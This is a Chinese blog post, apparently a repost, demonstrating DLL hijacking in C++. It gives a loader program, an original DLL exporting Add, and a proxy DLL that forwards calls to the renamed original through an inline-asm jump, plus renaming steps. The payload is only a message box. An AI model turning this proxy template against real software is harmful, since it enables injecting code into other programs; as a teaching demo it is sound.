zoukankan      html  css  js  c++  java

  • DLL劫持技术例子: HijackDll

    控制台程序:DllLoader

    Dll加载器,用于动态加载目标Dll,并动态调用目标函数

     1 #include <cstdio>
 2 #include <windows.h>
 3 
 4 typedef int (*pAdd) (int a, int b);
 5 
 6 int main()
 7 {
 8     HMODULE hModule = GetModuleHandleA("Dll.dll") != NULL ? GetModuleHandleA("Dll.dll") : LoadLibraryA("Dll.dll");
 9     pAdd Add = (pAdd)GetProcAddress(hModule, "Add");
10     if (NULL == Add)
11         printf("Failed\n");
12     else
13         printf("Succeed\n1 + 1 = %d\n", Add(1, 1));
14 
15     system("pause > nul");
16     return 0;
17 }
    main.cpp

    原Dll:Dll

    很简单的一个Dll,只有一个隐式函数Add.仅仅是一个简单的加法..

     1 #include <cstdio>
 2 #include <windows.h>
 3 
 4 #define EXTERNC extern "C"
 5 #define EXPORT __declspec(dllexport)
 6 #define ECEP EXTERNC EXPORT
 7 
 8 BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
 9 {
10     switch(fdwReason)
11     {
12     case DLL_PROCESS_ATTACH:
13         MessageBoxA(NULL, "Attach", "", MB_ICONINFORMATION);
14         break;
15     case DLL_PROCESS_DETACH:
16         MessageBoxA(NULL, "Detach", "", MB_ICONINFORMATION);
17         break;
18     default:
19         break;
20     }
21 
22     return TRUE;
23 }
24 
25 ECEP int Add(int a, int b)
26 {
27     return a + b;
28 }
    main.cpp

    劫持Dll:HijackDll

    用于劫持原Dll,并转发原程序的动态调用

     1 //last code by gwsbhqt at 20150727
 2 
 3 #include <cstdio>
 4 #include <windows.h>
 5 
 6 #define EXTERNC extern "C"
 7 #define NAKED __declspec(naked)
 8 #define EXPORT __declspec(dllexport)
 9 #define ECEP EXTERNC EXPORT
10 #define ENCDECL EXTERNC NAKED void __cdecl
11 #define EENSTD EXTERNC EXPORT NAKED void __stdcall
12 #define EENFAST EXTERNC EXPORT NAKED void __fastcall
13 #define ENDEF ENCDECL
14 
15 #define JMPFARPROC(lpModuleName, hProcName) \
16     HMODULE hModule; \
17     hModule = GetModuleHandleA((lpModuleName)); \
18     if (NULL == hModule) hModule = LoadLibraryA((lpModuleName)); \
19     if (NULL != GetProcAddress(hModule, (hProcName))) __asm JMP EAX;
20 
21 #pragma comment (linker, "/EXPORT:Add=_Add,@1")
22 
23 ENDEF Add()
24 {
25     JMPFARPROC("Dll.tmp", "Add");
26 }
27 
28 BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
29 {
30     switch (fdwReason)
31     {
32     case DLL_PROCESS_ATTACH:
33         MessageBoxA(NULL, "Hijack Dll Attach", "", MB_ICONINFORMATION);
34         break;
35     case DLL_PROCESS_DETACH:
36         MessageBoxA(NULL, "Hijack Dll Detach", "", MB_ICONINFORMATION);
37         break;
38     default:
39         break;
40     }
41 
42     return TRUE;
43 }
    main.cpp

    此处的宏JMPFARPROC看起来似乎每次转发函数都会加载一次hModule,其实不会,先GetModuleHandle获得的hModule是不会增加引用计数的.

    所以即使是大量的转发,也应该不会出现内存泄漏的问题.

    都是些很简单的代码,仔细认真看看就好了

    测试是只需要新建一个工程,工程下新建三个项目,分别是一个控制台程序和两个动态链接库,

    在每个项目新建main.cpp文件,将代码贴入,生成工程之后.在Debug/Release文件夹下,将Dll.dll更名为Dll.tmp,将HijackDll.dll更名为Dll.dll...

    即可完成Dll劫持...
  • 相关阅读:
    Object添加Symbol.iterator办法执行for--of
    二十四节气
    正则
    内容换行展示
    textarea 友好提示
    yyyy-MM-dd
    Repeater和PagedDataSource 绑定数据
    刷新 跳转 关闭 时弹窗
    SqlParameter CommandType.Text CommandType.StoredProcedure;
    JQuery disabled(禁用启用按钮)和display
  • 原文地址:https://www.cnblogs.com/gwsbhqt/p/4679088.html
Copyright © 2011-2022 走看看